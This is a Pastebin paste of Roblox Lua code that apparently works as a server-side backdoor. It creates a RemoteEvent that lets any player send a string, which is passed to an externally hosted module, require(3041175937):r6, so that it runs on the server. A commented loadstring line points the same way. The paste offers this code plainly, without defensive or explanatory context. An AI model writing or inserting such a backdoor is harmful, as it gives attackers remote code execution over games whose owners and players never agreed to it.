Advertisement
IDontNoJustUseIt

Untitled

May 26th, 2020
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. --local remote = script.Parent["RemotePleaseDie"] -- your remote ebicgamermolment
  2. script.Parent.Parent.Parent.Enabled = false
  3. --local plr = game.Players.LocalPlayer.Name
  4. --(plr)
  5.  
  6. remotef = Instance.new("RemoteEvent", script.Parent)
  7. remotef.Name = "RemotePleaseDieSuck"
  8.  
  9. -- script.Parent["RemotePleaseDieSuck"].OnServerEvent:Connect(function(Player, SpecialString)
  10. -- print(Player.Name .. " sent us the string: " .. SpecialString)
  11. --end)
  12.  
  13.  
  14. script.Parent.Parent.Parent.Enabled = true
  15. script.Parent["RemotePleaseDieSuck"].OnServerEvent:Connect(function(Player, SpecialString)
  16. require(3041175937):r6(SpecialString) -- this code so it actally executes requires and things
  17. end)-- end) meaning this is the end of the script return function
  18. --4985176321
  19. --require(script.Loadstring)(lol)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement